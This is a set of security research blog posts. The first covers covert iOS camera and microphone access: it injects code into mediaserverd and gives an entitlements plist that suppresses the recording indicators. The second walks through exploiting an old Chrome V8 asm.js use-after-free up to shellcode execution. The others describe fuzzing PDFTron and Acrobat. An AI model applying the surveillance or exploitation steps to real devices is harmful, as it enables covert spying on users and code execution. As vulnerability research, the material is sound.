/System/Library/PrivateFrameworks/CoreSpeech.framework/corespeechd relies on VoiceTrigger.framework to continuously monitor the user’s voice, and then activate Siri when a keyword is heard.

Accessibility -> VoiceControl

Voice control allows you to interact with the device using voice commands.

/System/Library/PrivateFrameworks/SpeechRecognitionCore.framework/XPCServices/com.apple.SpeechRecognitionCore.brokerd.xpc/XPCServices/com.apple.SpeechRecognitionCore.speechrecognitiond.xpc/com.apple.SpeechRecognitionCore.speechrecognitiond

is responsible for accessing the microphone.

Accessibility -> Switch Control

Part of the SwitchControl function is to detect the movement of the user’s head to interact with the device. Very cool feature! It’s handled by:

/System/Library/PrivateFrameworks/AccessibilityUI.framework/XPCServices/com.apple.accessibility.AccessibilityUIServer.xpc/com.apple.accessibility.AccessibilityUIServer

and

/System/Library/CoreServices/AssistiveTouch.app/assistivetouchd

These features must access the microphone or camera to function, yet they do not trigger the green/orange visual indicators. Mobile malware can do the same.

By injecting a malicious thread into the com.apple.accessibility.AccessibilityUIServer or com.apple.SpeechRecognitionCore.speechrecognitiond daemons, attackers can gain silent access to the microphone. Camera access requires an additional patch, which we will discuss later.

Bypass TCC Prompt

TCC stands for “Transparency, Consent, and Control”. iOS users often experience this prompt:

The core of TCC is a system daemon called tccd, and it manages access to sensitive databases and the permission to collect sensitive data from input devices, including but not limited to microphone and camera.

Did you know? The TCC prompt only applies to applications with a UI. Anything running in the background requires a special entitlement to operate. The entitlement looks like the picture below; kTCCServiceMicrophone alone is enough for microphone access.

Camera access is a little more complicated. In addition to tccd, another system daemon called mediaserverd ensures that no process in the background running state can access the camera. 

So far, it looks like an extra step (e.g. patching mediaserverd) is needed to access the camera in the background while the user is interacting with another foreground application.

Disable Visual Indicators For Microphone, Camera Access

The first method is rough: use Cycript to inject code into SpringBoard, causing the indicator to disappear abruptly.

Inspired by com.apple.SpeechRecognitionCore.speechrecognitiond and com.apple.accessibility.AccessibilityUIServer, we found a private entitlement (com.apple.private.mediaexperience.suppressrecordingstatetosystemstatus) that fits our purpose perfectly! Unfortunately, this method does not work for camera access.

Accessing Camera in the Background by Patching ‘mediaserverd’

mediaserverd is a daemon that monitors media capture sessions. Processes that want to access the camera must be approved by tccd as well as mediaserverd, which acts as an extra layer of security after tccd. It also terminates camera access when it detects that an application is no longer running in the foreground. 

Noteworthy: mediaserverd is not signed with the get-task-allow entitlement, which prevents code injection. 

Because get-task-allow is absent, dynamic debuggers that rely on obtaining task ports, such as Cycript and Frida, do not work on the mediaserverd daemon. mediaserverd also gets killed by the system when it is unresponsive, even for a short time. This is uncommon: these signs tell us that mediaserverd is in charge of something important.

When a process switches to the background, mediaserverd will get notified and revoke camera access for that particular process. We need to find a way to make mediaserverd do nothing when it detects that the process is running in the background.

Following brief research, we found that it is possible to prevent mediaserverd from revoking camera access by hooking the Objective-C method -[FigCaptureClientSessionMonitor _updateClientStateCondition:newValue:], so no code overwriting is required. 

To inject into mediaserverd, we used lldb. lldb does not rely on the task port; instead, it calls the kernel for code injection. In reality, threat actors that already have kernel code execution capabilities can replace the entitlements of mediaserverd to perform such an injection.

POC source code is available here.

And on Mac…

From previous experiments back in 2015, the green light next to the front camera on a Mac cannot be turned off using software alone. Modifying the AppleCameraInterface driver and uploading custom webcam firmware did not do the trick: the light is wired to the camera's power, so it remains on as long as the camera is powered. Hardware-based indicators are ideal from a privacy perspective. We have not validated this on recent Mac versions/hardware.

Demo

We made a demonstration, accessing the camera/microphone from a background process and streaming video/audio using the RTMP protocol. The steps:

  1. Set up RTMP server
  2. Compile mediaserver_patch, inject the code into mediaserverd
  3. Compile ios_streaming_cam, re-sign the binary with the following entitlements, and run it in the background
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>com.apple.private.security.container-required</key>
    <false/>
    <key>platform-application</key>
    <true/>
    <key>com.apple.private.tcc.allow</key>
    <array>
        <string>kTCCServiceMicrophone</string>
        <string>kTCCServiceCamera</string>
    </array>
    <key>com.apple.security.iokit-user-client-class</key>
    <array>
        <string>IOSurfaceRootUserClient</string>
        <string>AGXDeviceUserClient</string>
    </array>
    <key>com.apple.private.mediaexperience.suppressrecordingstatetosystemstatus</key>
    <true/>
    <key>com.apple.private.mediaexperience.startrecordinginthebackground.allow</key>
    <true/>
    <key>com.apple.private.avfoundation.capture.nonstandard-client.allow</key>
    <true/>
</dict>
</plist>

By: 08Tc3wBB

Chrome Exploitation: An old but good case-study

Since the announcement of @hack, one of the world’s largest infosec conferences, which will take place during Riyadh Season, Haboob’s R&D team has submitted three talks. All of them were accepted.

One topic in particular is of interest to a lot of vulnerability researchers: browser exploitation in general, and Chrome exploitation in particular. We therefore decided to present a Chrome exploitation talk focused on case studies we have been working on: a generation-to-generation comparison of the different eras Chrome exploitation has gone through. Throughout our research, we go through multiple components and analyze whether the techniques and concepts used to develop Chrome exploits have changed.

One of the vulnerabilities that we looked into dates back to 2017: CVE-2017-15399, which was demonstrated at Pwn2Own. The bug existed in Chrome version 62.0.3202.62.

That said, let’s start digging into the bug.

But before we actually start, let's have a sneak peek at the bug! The bug occurred in V8's WebAssembly implementation. Here is the submitted POC:

Root Cause Analysis:

Running the POC on the vulnerable V8 engine triggers the crash; we can observe the crash context:

To accurately deduce which function triggered the crash, we print the stack trace at the time of the crash:

We noticed that the last four function calls inside the stack were not part of Chrome or any of its loaded modules.

So far, we can notice two interesting things. First, the faulting instruction accessed an address that is not mapped into the process, which could mean it is part of the JavaScript Ignition engine. Second, the same address that triggered the crash is hardcoded inside the opcode itself:

These function calls were made from two RWX pages that were allocated during execution.

Since the POC uses asm.js, V8 compiles the asm.js module into machine code using AOT (Ahead-of-Time) compilation to enhance performance. We notice that there are hardcoded memory addresses that could potentially be what is causing the bug.

A Quick Look Into asmJS:

For now, let's focus entirely on asm.js and on the following snippet from the POC. We changed the variable and function names in a way that helps us understand the snippet better:

The code above gets compiled into machine code by V8. asm.js is essentially a standard that specifies to browsers how such code should be parsed.

When V8 parses a module that begins with "use asm", it treats the rest of the code differently and compiles it into a WASM (WebAssembly) module. The interface of an asm.js function is:

So asm.js code accepts three arguments:

  • stdlib: The stdlib object should contain references to a number of built-in functions to be used as the runtime.

  • foreign: used for user-defined functions.

  • heap: gives you an ArrayBuffer which can be viewed through a number of different lenses, such as Int32Array and Float32Array.

In our POC, the stdlib contained the typed-array constructor Uint32Array, and we created the heap using WASM memory with the following call:

memory = new WebAssembly.Memory({initial:1});

So, the complete function call should be as the following:

evil_f = module({Uint32Array:Uint32Array},{},memory.buffer);

Now, V8 will compile the asm.js module using the hardcoded address of the backing store of the JSArrayBuffer as its memory.

The backing store of the JSArrayBuffer is held by a std::shared_ptr<> that counts references, but the address itself was already compiled into the generated machine code as an offset. The reference count is therefore not incremented for this raw pointer access.

Based on the WASM spec, when a memory needs to grow, it must detach the previous memory and its backing store and then free the previously allocated memory: memory.grow(1); // releases the std::shared_ptr<BackingStore>. We can see this behaviour in the file src/wasm/wasm-js.cc.

Now the HEAP pointer inside the asm.js module is invalid and points to a freed allocation; to trigger the access, we just need to call the asm.js function.

If we look inside DetachWebAssemblyMemoryBuffer, we can see how it frees the backing store:

After that, calling the asm.js module triggers the use-after-free bug.

The following comments should summarize how the use after free occurred:

WebAssemblyMemory

To investigate further into our crash point and attempt to figure out where the hardcoded offset comes from, we tracked down the creation of the WasmMemoryObject JSObject inside WebAssemblyMemory, a C++ function invoked by the following JavaScript line.

evil_f = module({Uint32Array:Uint32Array},{},memory.buffer); // we save a hardcode address to it

We set a breakpoint at NewArrayBuffer, which calls ShellArrayBufferAllocator::Allocate. This trace step was necessary to catch the initially created memory buffer (0x11CF0000). Afterwards, we set a break-on-access on it (ba r1 11CF0000) to catch any access attempt, letting us observe the crashing point before the use-after-free occurs.

After our break-on-access was triggered, we inspected the assembly instructions around the breakpoint, which turned out to be the generated assembly for the asm.js f1 function in our original POC. We can see that it got compiled with range checks to eliminate out-of-bounds accesses. We also noticed that the initial memory allocation was hardcoded in the opcode.

Executing memory.grow() frees the memory buffer, but since its address was hardcoded inside the compiled asm.js function (a dangling pointer), a use-after-free occurs. The Chrome developers did not implement a proper check in the grow process for WasmMemoryObject: they only implemented a check for the WasmInstance object, and since our case is asm.js, our object was not treated as a WasmInstance object and therefore did not go through the grow checks.

Now we have a clear UAF bug and we'll try to utilize it.

Exploitation

Since the memory freed by the UAF bug falls under the old space, we needed a way to control that memory region. As this was our first time exploiting such a bug, we found a lot of similarities between Adobe and Chrome in terms of exploitation concepts. Still, this was not an easy task, since the memory management is totally different, and we had to dig deeper into the V8 engine to understand things like JSObject anatomy. The plan was laid out on the assumption that creating another WASM instance and hijacking it later for code execution would work, so our plan was as follows:

  • Triggering UAF Bug.

  • Heap Spray and reclaim the freed address.

  • Smash & Find Controlled Array.

  • Achieve Read & Write Primitives.

  • Achieve Code Execution.

Triggering UAF Bug:

We trigger the bug by calling the memory function grow() so that the buffer is freed. Doing so results in the freed memory region falling under the old space; this step is important for reclaiming the memory and controlling the bug. We allocated a decent size for the WasmMemory to make sure the V8 heap would not be fragmented.

Heap Spray:

Thanks to our long journey of controlling Adobe bugs, this step was easy to accomplish. The only difference is that we no longer need to poke holes in our spray, since the goal is to reclaim the freed memory. We used JSArray and JSArrayBuffer to spray the heap, to later achieve both the addrof and R/W primitives.

Smash & Find:

In order to read forward from the initially controlled UAF memory, we first need a way to corrupt the size of a JSArrayBuffer into something huge. With the help of asm.js we can corrupt it and build a lookup function for that corrupted JSArrayBuffer's index; since we filled our spray with the number ‘4’, it acts as our magic value to search for from the asm.js side. Writing asm.js code is really hectic because of the pointer addressing, but once you get used to it, it becomes easy.

We implemented a lookup function to search for magic values in the heap. A simple lookup implementation in JS could look like the following, where we search our spray arrays for the corrupted array using the value 0x56565656:

Now that we have an offset to an array that can be used to store JSObjects, we can achieve addrof primitive using the asmjs AddrOf function and use it to leak the address of JSObjects to help us achieve code execution. Please consider that you may need to dig a bit deeper into an object's anatomy to understand what you really need to leak.

We implemented our addrof primitive using the following wrappers:

Achieving Read & Write Primitives:

We are missing one more thing to complete our rocket: the R/W primitives. What we really want is to corrupt a JSArrayBuffer's length to give us forward access to memory. Since the second DWORD of the JSArrayBuffer header contains the length, we searched for our size (0x40) and overwrote the length with a bigger value.

Achieving Code Execution:

At last, the final stage of the launch requires two more components. The first is an asm.js function that overwrites any provided offset; this helps us achieve a write primitive by changing the JSArrayBuffer backing-store pointer to an executable memory page:

The second is a WASM instance that allocates a PAGE_EXECUTE_READWRITE page in V8 for us to hijack. A simple definition could look like this:

Putting things together with a simple calc.exe shellcode:

That’s everything, we started with a simple PoC and ended up with achieving code execution :D

Hope you enjoyed reading this post :) See you in @Hack!

Applying Fuzzing Techniques Against PDFTron: Part 2

Introduction

In our first blog we covered the basics of how we fuzzed PDFTron using Python. The results were quite interesting and yielded multiple vulnerabilities. Even with the number of vulnerabilities we found, we were not fully satisfied. We eventually decided to take it a touch further by utilizing LibFuzzer against PDFTron.

Throughout this blog post, we will attempt to document our short journey with LibFuzzer, the successes and failures. Buckle up, here we go..

Overview

LibFuzzer is part of the LLVM package. It allows you to integrate the coverage-guided fuzzer logic into your harness. A crucial feature of LibFuzzer is its close integration with Sanitizer Coverage and bug detecting sanitizers, namely: Address Sanitizer (ASAN), Leak Sanitizer, Memory Sanitizer (MSAN), Thread Sanitizer (TSAN) and Undefined Behaviour Sanitizer (UBSAN).

The first step in integrating LibFuzzer into your project is to implement a fuzz target – a function that accepts an array of bytes, which LibFuzzer will mutate and feed in through its entry point (LLVMFuzzerTestOneInput):

When we integrate a harness with the function provided by LibFuzzer (LLVMFuzzerTestOneInput()), which is LibFuzzer's entry point, we can observe how LibFuzzer works internally.

Recent versions of Clang (starting from 6.0) include LibFuzzer without the need to install any dependencies. To build your harness with LibFuzzer integrated, use the -fsanitize=fuzzer flag during compilation and linking. In some cases, you might want to combine LibFuzzer with AddressSanitizer (ASAN), UndefinedBehaviorSanitizer (UBSAN), or both. You can also build it with MemorySanitizer (MSAN):

In our short research, we used additional options to build our harness since we targeted PDFTron, specifically to satisfy dependencies (header files, etc.).

To properly benchmark our results, we decided to build the harness on both Linux and Windows.

Libfuzzer on Windows

To compile the harness, we first need to download the LLVM package, which contains the Clang compiler. You can download it from the LLVM Snapshot Builds page (Windows).

Building the Harness - Windows:

To get accurate results and make the comparison fair, we targeted the same feature we fuzzed during part 1 (ImageExtract), which can be downloaded from here. PDFTron provides implementations of its features in various programming languages; we went with the C++ implementation since our harness was developed in the same language.

When reviewing the source code sample for ImageExtract, we found the PDFDoc constructor, which by default takes the path of the PDF file we want to extract images from. This constructor worked perfectly with our custom fuzzer, since that fuzzer was file-based. LibFuzzer is completely different: it is an in-memory fuzzer and provides its mutated test cases in memory through LLVMFuzzerTestOneInput.

If PDFTron's implementation of ImageExtract only offered the option to extract images from a PDF file on disk, we could still work around the constraint with a simple trick: dumping the test cases that LibFuzzer generates to disk, then passing the path to the PDFDoc constructor.

However, this technique reduces the overall performance of the fuzzer. You always want to avoid file and I/O operations, as they are the slowest; such workarounds should be a last resort.

In our search for an alternative solution (since I/O operations are lava!) we inspected the source code of the ImageExtract feature and in one of its headers we found multiple implementations for the PDFDoc constructor. One of the implementations was so perfect for us, we thought it was custom-made for our project.

The constructor accepts a buffer and its size (which will be provided by LibFuzzer). So, now we can use the new constructor in our harness without any performance penalties and minimal changes to our code.

Now all we have to do is change the ImageExtract sample's main function from accepting one argument (a file path) to two arguments (a buffer and its size), then add the LibFuzzer entry point function.

At this point our harness is primed and ready to be built.

Compiling and Running the Harness - Windows

Before compiling our harness, we need to provide the static library that PDFTron uses. We also need to provide PDFTron’s headers path to Clang so we can compile our harness without any issues. The options are:

  • -L : Add directory to library search path

  • -l : Name of the library

  • -I : Add directory to include search path.

The last option that we need to add is -fsanitize=fuzzer to enable fuzzing in our harness.
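Assembled into a single invocation, the build command might look something like this (the include/library paths and the library name are placeholders, not PDFTron's actual file names):

clang++ harness.cpp -o harness.exe -fsanitize=fuzzer -I C:\pdftron\Headers -L C:\pdftron\Lib -l PDFNetC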

To run the harness, we need to provide the corpus folder that contains the initial test-cases that we want LibFuzzer to start mutating.

We tested the -fsanitize=fuzzer,address (Address Sanitizer) option to see if our fuzzer would yield more crashes, but we realized that address sanitization was not behaving as it should under Windows. We ended up running our harness without the Address Sanitizer, and we managed to trigger the same crashes we previously found using our custom fuzzer (part 1).

LibFuzzer on Linux

Since PDFTron also supports Linux, we decided to test run LibFuzzer on Linux so we can run our harness with the Address Sanitizer option enabled. We also targeted the same feature (ImageExtract) to avoid making any major changes. The only significant changes were the options provided during the build time.

Compiling and Running the Harness - Linux

The options that we used to compile the harness on Linux are pretty much the same as on Windows. We need to provide the headers path and the library PDFTron used:

  • -L : Add directory to library search path

  • -l : Name of the library (without .so and lib suffix)

  • -I : Add directory to the end of the list of include search paths

Now we need to pass both the fuzzer and address options as the -fsanitize value to enable fuzzing together with the Address Sanitizer:

Our harness is now ready to roll. To keep our harness running, we had to add these two arguments on Linux:

  • -fork=1

  • -ignore_crashes=1

The -fork option allows us to spawn a concurrent child and provides it with a small random subset of the corpus.

The -ignore_crashes option allows LibFuzzer to continue running without exiting when a crash occurs.

After running our harness over a short period of time, we discovered 10 unique crashes in PDFTron.

 

 

Conclusion:

Throughout our small research, we were able to uncover new vulnerabilities along with triggering the old ones we discovered previously.

Sadly, LibFuzzer under Windows does not yet seem mature enough to be used against targets like PDFTron. Nevertheless, using LibFuzzer on Linux was easy and stable.

 

Hope you enjoyed the short journey, until next time!

Happy hunting!


Applying Fuzzing Techniques Against PDFTron: Part 1

Introduction:

The PDFTron SDK provides a wide variety of PDF parsing functionality, from reading and viewing PDF files to converting them to different file formats. The SDK is widely used and supports multiple platforms; it also exposes a rich set of APIs that help automate PDFTron's functionality.

PDFTron was one of the targets we started looking into when we decided to investigate PDF readers and PDF converters. Throughout this blog post, we will discuss the brief research that we did, breaking down the harnessing and fuzzing of different PDFTron functionalities.

How to Tackle the Beast: CLI vs Harnessing:

Since PDFTron provides well-documented CLIs, that was the obvious route for us to take; we considered it low-hanging fruit. Our initial plan was to pick a command such as pdf2image, craft random PDF files, and feed them to that CLI. We got some crashes this way and thought it can't get any better, right? Right???

But after a while, we wanted to take our project a step further by developing a custom harness using their publicly available SDK.

Luckily, we found a great deal of sample projects on their website: small programs developed in C++, ripe and ready to be compiled and executed. Each program performs a very specific function, such as adding an image to a PDF file, extracting an image from a PDF file, etc.

We could easily integrate those code snippets into our project, feed them mutated inputs and monitor their execution.

For example, we harnessed the image-extraction functionality and made minor modifications to the code so that it takes two arguments:

1. The mutated file path.

2. The destination where we want the image to be extracted.

 

 Following are the edited parts of PDFTron’s code:

How Does our Fuzzer Work?

We developed our own custom fuzzer that uses Radamsa as a mutator, feeds the harness the mutated files, and monitors the execution flow of the program. If and when a crash occurs, the fuzzer logs all relevant information, such as the call stack and the register state.

What makes our fuzzer generic is a config file in JSON format, in which we specify the following:

1- Mutation file format.

2- Harness path.

3- Test-cases folder path.

4- Output folder path.

5- Mutation tool path.

6- Hashes file path.

We fill these fields in based on our targeted application, so we don’t have to change our fuzzer source code for each different target.
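As a minimal sketch, such a config could look like the following (the key names here are illustrative, not the exact ones we used):

{
  "mutation_file_format": ".pdf",
  "harness_path": "C:\\fuzzing\\harness.exe",
  "testcases_path": "C:\\fuzzing\\testcases",
  "output_path": "C:\\fuzzing\\output",
  "mutation_tool_path": "C:\\tools\\radamsa\\radamsa.exe",
  "hashes_file_path": "C:\\fuzzing\\hashes.txt"
}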

The Components:

We divided the fuzzer into various components, each with a specific functionality. The components of our fuzzer were:

A. Test Case Generator: Handled by Radamsa.

B. Execution Monitor: Handled by PyKd.

C. Logger: Custom-built logger.

D. Duplicate Handler: Handled by !exploitable Toolkit.

We will go over each component and our way of implementing it in details in the next section.

A. Test Case Generator:

As mentioned before, we used Radamsa as our (mutation-based) test case generator. We integrated it with our fuzzer mainly because it supports a lot of mutation types, which saves plenty of time otherwise spent reimplementing and optimizing them.

We also listed some of the mutation types that Radamsa supports and stored them in a list, so we can pick a random mutation type each time.

After generating the list, we assemble Radamsa's full command with all the needed arguments to start generating the test cases:
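A rough Python sketch of that step (the mutation abbreviations are a subset of Radamsa's -m options; the paths and names are placeholders):

import random
import subprocess

# A few of Radamsa's mutation types: bit flip, byte drop/insert/repeat,
# sequence repeat/delete.
MUTATIONS = ["bf", "bd", "bi", "br", "sr", "sd"]

def generate_testcases(seed_file, out_dir):
    mutation = random.choice(MUTATIONS)
    subprocess.run([
        "radamsa.exe",
        "-m", mutation,                     # mutation type to apply
        "-n", "20",                         # 20 mutated files per run
        "-o", out_dir + "\\fuzz-%n.pdf",    # %n = test case index
        seed_file,
    ], check=True)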

Now we have the test cases in the desired destination folder; each time we execute this function, Radamsa generates 20 mutated files that will later be fed to the targeted application.

B. Execution Monitor:

This part is considered as the main component in our fuzzer, it contains three main stages:

1. Test case running stage.

2. Program execution stage.

3. Logging stage. 

After we have prepared the mutated files, we can test them on the selected target. In our fuzzer, we used the PyKd library to execute the harness and check its execution progress. If the harness terminates execution normally, our fuzzer tests the next mutated file; if it terminates due to an access violation, our fuzzer deals with it (more details on this later).

PyKd runs the harness and uses the expHandler variable to check the status of the harness execution, letting the fuzzer decide whether a crash happened. We created a class called ExceptionHandler that monitors the execution flow of our harness and checks the exception code; if the value is 0xC0000005 (access violation), it's usually a promising bug.
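A minimal sketch of that monitor, assuming the pykd 0.3-style API (the harness command line is a placeholder):

import pykd

ACCESS_VIOLATION = 0xC0000005

class ExceptionHandler(pykd.eventHandler):
    def __init__(self):
        pykd.eventHandler.__init__(self)
        self.accessViolationOccured = False

    def onException(self, exceptInfo):
        # Treat access violations as promising crashes
        if exceptInfo.exceptionCode == ACCESS_VIOLATION:
            self.accessViolationOccured = True
            return pykd.eventResult.Break
        return pykd.eventResult.NoChange

pykd.startProcess("harness.exe mutated.pdf out_dir")
expHandler = ExceptionHandler()
pykd.go()  # run until the harness exits or the handler breaks in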

If accessViolationOccured is set to true, our fuzzer saves the mutated file for us to analyze later; if it is set to false, the mutated file did not affect the harness execution, and the fuzzer tests another file.

C. Logging:

This component is crucial in any fuzzing framework. The role of the logger is to write a file that briefly details the crash and to save the mutated file that triggered it. Some important details you might want to include in a log:

- Assembly instruction before the crash. 

- Assembly instruction where the crash occurred.

- Register states.

- Call stack.

After fetching all the information we need from the crash, we can write it to a log file. To avoid naming-duplication problems, we saved both the test case that triggered the crash and the log file using the epoch time as their file names.
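A sketch of that saving step (the helper name and the crash-details format are illustrative):

import shutil
import time

def save_crash(testcase_path, crash_details, output_dir):
    # The epoch time gives both files a unique, matching name
    epoch = str(int(time.time()))
    shutil.copy(testcase_path, "%s\\%s.pdf" % (output_dir, epoch))
    with open("%s\\%s.log" % (output_dir, epoch), "w") as log:
        log.write(crash_details)  # faulting instruction, registers, call stack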

This code snippet saves the PoC that triggered the crash and creates a related log file on disk for later analysis.

 

D. Duplicate Handler:

After running the fuzzer over long periods of time, we found that the same crash may occur multiple times and gets logged each time it happens, making it harder for us to analyse unique crashes. To control duplicate crashes, we used MSEC.dll, which is created by the Microsoft Security Engineering Center (MSEC). 

We first need to load the DLL to WinDbg.

Then we used a tool called !exploitable: it generates a unique hash for each crash, along with a crash analysis and risk assessment. Each time the program crashes, we run the tool to get the hash of the crash and compare it to the hashes we have already collected. If it matches one of them, we do not save a log for this crash. If it's a unique hash, we store the new hash with the previously discovered ones and save a log file for the new crash together with its test case.
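A sketch of that deduplication logic on top of pykd; we key on the hash line itself, since the exact output format depends on the MSEC version:

import pykd

def is_duplicate(known_hashes):
    pykd.dbgCommand(".load msec.dll")          # load MSEC into the debugger
    report = pykd.dbgCommand("!exploitable")   # crash analysis + hash
    # Use the line carrying the hash as the deduplication key
    hash_line = next((l for l in report.splitlines() if "Hash" in l), report)
    if hash_line in known_hashes:
        return True
    known_hashes.add(hash_line)
    return False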

In the second part of this blogpost, we will discuss integrating the harness with a publicly available fuzzer and comparing the results between these two different approaches.


Stay tuned, and as always, happy hunting!







Modern Harnessing Meets In-Memory Fuzzing - PART 2

Introduction:

In the first part of the blog post we covered ways to harness certain SDKs along with in-memory fuzzing and how to harness applications using technologies such as TTD (Time Travel Debugging).

In this part of the blog post, we will cover some techniques that we used to uncover vulnerabilities in various products. It involves customizing WinAFL’s code for that purpose.

Buckle up, here we go..

 

WINAFL

WinAFL is a well-known fuzzer used to fuzz Windows applications. It is originally a fork of AFL, which was initially developed to fuzz Linux applications. Because of how instrumentation works in the Linux version, it had to be rewritten to work on Windows with a different instrumentation engine. WinAFL mainly uses DynamoRIO for instrumentation, but it can also use Intel PT, decoding traces to gather the code coverage that serves as its instrumentation.

We care about execution speed and performance. Since we don't have a generative mutation engine specialized for PDF structures, we decided to go with no instrumentation, as WinAFL's mutation engine works best with binary data rather than text-like PDF data.

Flipping a bit a million times will probably make no difference :)

WinAFL Architecture

WinAFL's Intel PT (Processor Trace) mode relies on the Windows debugging APIs to debug and monitor the target process for crashes. The Win32 debugging APIs work with debug events that are sent from the target to the debugger; an example of such an event is LOAD_DLL_DEBUG_EVENT, the load-dynamic-link-library (DLL) debugging event.

For a complete list of debugging events that can be triggered from the debuggee (target), please check the MSDN documentation on DEBUG_EVENT.

To describe the process of WinAFL fuzzing architecture we created a simple diagram that shows the important steps that we used from WinAFL:

 1. Create a new process while also specifying that we want to debug the process. This step is achieved through calling CreateProcess API and specifying the dwCreationFlags flag with the value of `DEBUG_PROCESS`. Now the application will need to be monitored by using WaitForDebugEvent to receive debug events.

2. While listening for Debug Events in our debug loop, a LOAD_DLL_DEBUG_EVENT event is encountered which we can parse and determine if it’s our target DLL based on the image name, if so, we place a software breakpoint at the start of the Target Function.

3. If our software breakpoint gets triggered, we are notified through a debugging event, this time an exception of type EXCEPTION_BREAKPOINT. From there, WinAFL saves the arguments based on the calling convention. In our case it's __stdcall, so all of our arguments are on the stack; we save the passed arguments and the context to replay them later. WinAFL performs in-memory fuzzing by overwriting the return address on the stack with an address that can't be allocated normally (0x0AF1). 

4. When the function returns normally, it triggers an access violation at address 0x0AF1. WinAFL knows this exception means we returned from the target function, and that it is time to restore the previously saved stack frame containing the target function's arguments, as well as the register context saved during step 3. (A minimal Python sketch of the first two steps follows.)
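To make the debug loop concrete, here is a rough Python (ctypes) sketch of steps 1 and 2; structure layouts are abbreviated, the target name is a placeholder, and this is not WinAFL's actual code:

import ctypes
from ctypes import wintypes

kernel32 = ctypes.windll.kernel32

DEBUG_PROCESS        = 0x00000001
DBG_CONTINUE         = 0x00010002
LOAD_DLL_DEBUG_EVENT = 6

class STARTUPINFO(ctypes.Structure):
    _fields_ = [("cb", wintypes.DWORD),
                ("_pad", ctypes.c_byte * 100)]  # remaining fields left zeroed

class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [("hProcess", wintypes.HANDLE),
                ("hThread", wintypes.HANDLE),
                ("dwProcessId", wintypes.DWORD),
                ("dwThreadId", wintypes.DWORD)]

class DEBUG_EVENT(ctypes.Structure):
    _fields_ = [("dwDebugEventCode", wintypes.DWORD),
                ("dwProcessId", wintypes.DWORD),
                ("dwThreadId", wintypes.DWORD),
                ("u", ctypes.c_byte * 164)]  # opaque padding for the event union

si = STARTUPINFO(); si.cb = ctypes.sizeof(si)
pi = PROCESS_INFORMATION()
cmd = ctypes.create_unicode_buffer("target.exe")  # placeholder target

# Step 1: create the target with DEBUG_PROCESS so we receive its debug events
kernel32.CreateProcessW(None, cmd, None, None, False, DEBUG_PROCESS,
                        None, None, ctypes.byref(si), ctypes.byref(pi))

evt = DEBUG_EVENT()
while kernel32.WaitForDebugEvent(ctypes.byref(evt), 0xFFFFFFFF):
    if evt.dwDebugEventCode == LOAD_DLL_DEBUG_EVENT:
        # Step 2: resolve the image name; if it is the target DLL,
        # plant a software breakpoint at the target function.
        pass
    kernel32.ContinueDebugEvent(evt.dwProcessId, evt.dwThreadId, DBG_CONTINUE)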

Customizing Winafl to target ConverterCoreLight

In the Frida section of part 1, we showcased our attack-vector approach. To automate it, we modified WinAFL-PT to fit our needs:

Hardcoded configuration options used to control fuzzing.

Redirecting execution to PdfConverterConvert, saving the address of PdfConverterConvert in the configuration options to modify EIP at the restoration phase.

on_target_method gets called by WinAFL's debugger engine when execution reaches PdfConverterConvertEx. Snapshotting the context depends on the calling convention; PdfConverterConvert is __stdcall, which means we only care about the arguments on the stack. Therefore, we store the original stack values using the read_stack wrapper, then allocate memory in the Acrobat process to hold the path of our mutated input and save it in the backup we just took. We will perform the redirection when the function ends.

When the target method ends, we restore the stack pointer and modify EIP to point to our target function PdfConverterConvert. We also have to fix the argument order to match PdfConverterConvert, as we did in our Frida POC.

Since we only used some of WinAFL's features, we decided to eliminate the unnecessary ones related to crash handling and instrumentation (Intel PT) to increase the overall performance of our fuzzer. We also implemented our own crash analysis that triages crashes and provides a summary of each unique crash.

Profit

References

https://en.wikipedia.org/wiki/Fuzzing

https://crossbowerbt.github.io/in_memory_fuzzing.html

https://diglib.tugraz.at/download.php?id=576a78fa4aae7&location=browse

https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-debug_event

https://github.com/googleprojectzero/winafl/blob/master/winaflpt.c

Modern Harnessing Meets In-Memory Fuzzing - PART 1

Fuzzing or Fuzz Testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program then observe how the program processes it.

In one of our recent projects, we were interested in fuzzing closed-source applications (mostly black-box). Most standard fuzz testing mutates the program inputs, which normally requires a lot of reverse engineering to rebuild the target features that process that input. Wanting to enhance our fuzzing process, we came across an interesting technique where you don't need to know much about the program's initialization and termination prior to the target functions (a tedious job in some binaries that takes a lot of time to reverse and understand). The technique also has the benefit of being able to start a fuzz cycle at any subroutine within the program.

So we decided to enhance our fuzzing process with another fuzzing technique, Introducing: In-Memory Fuzzing.

A nice explanation of how in-memory fuzzing works comes from Emanuele Acri: "If we consider an application as a “chain of functions” that receives an input, parses and processes it, then produces an output, we can describe in-memory fuzzing as a process that “tests only a few specific rings” of the chain (those dealing with parsing and processing)".

And based on many fuzzing articles there are two types of in-memory fuzzing:

- Mutation loop insertion, where the program code is changed by creating a loop that directs execution back to a function used previously in the program.

- Snapshot restoration mutation, where the context and the arguments are saved at the beginning of the target routine, and the context is restored at the end of the routine to execute a new test case.

We used the second type because we wanted to execute the target function at the same program context with each fuzzing cycle.

In one of our fuzzing projects, we targeted the Solid framework. We were able to harness it fully through their SDK, but we wanted to go the extra mile and fuzz Solid using Adobe Acrobat's integration code. Acrobat uses Solid with a custom OCR and configuration beyond what the normal SDK provides, which made fuzzing through Acrobat DC directly all the more interesting.

This blog post will introduce techniques and tools that aid in finding a fuzzing vector for a feature inside a huge application. Finding a fuzzing vector varies between applications, as there is no single simple way to do it. No worries though, we've got you covered: we'll introduce various tools that will make binary analysis more enjoyable.

Roll up your sleeves; we promise that by the end of this blog post you will understand how to harness Solid Framework the way Acrobat DC uses it :)

Finding a Fuzzing Vector

Relevant code that we need to analyze

The first step is identifying the function that handles our application input. To find it, we need to analyze the arguments passed to each function and locate a controllable argument: one that, when fuzzed, will not corrupt other structures inside the application. We implemented our fuzzing logic around a file path that we control, a path on disk passed to a function that parses the content of the file.

Adobe Acrobat DC divides its code base into DLLs: shared libraries that Acrobat loads at run time to call their exported functions. There are many DLLs inside Adobe Acrobat, and finding a specific one can be troublesome. From the previous post, however, we know that Solid provides its DLLs as part of its SDK deliverable, and luckily, Acrobat has a separate folder that contains the Solid Framework SDK files.

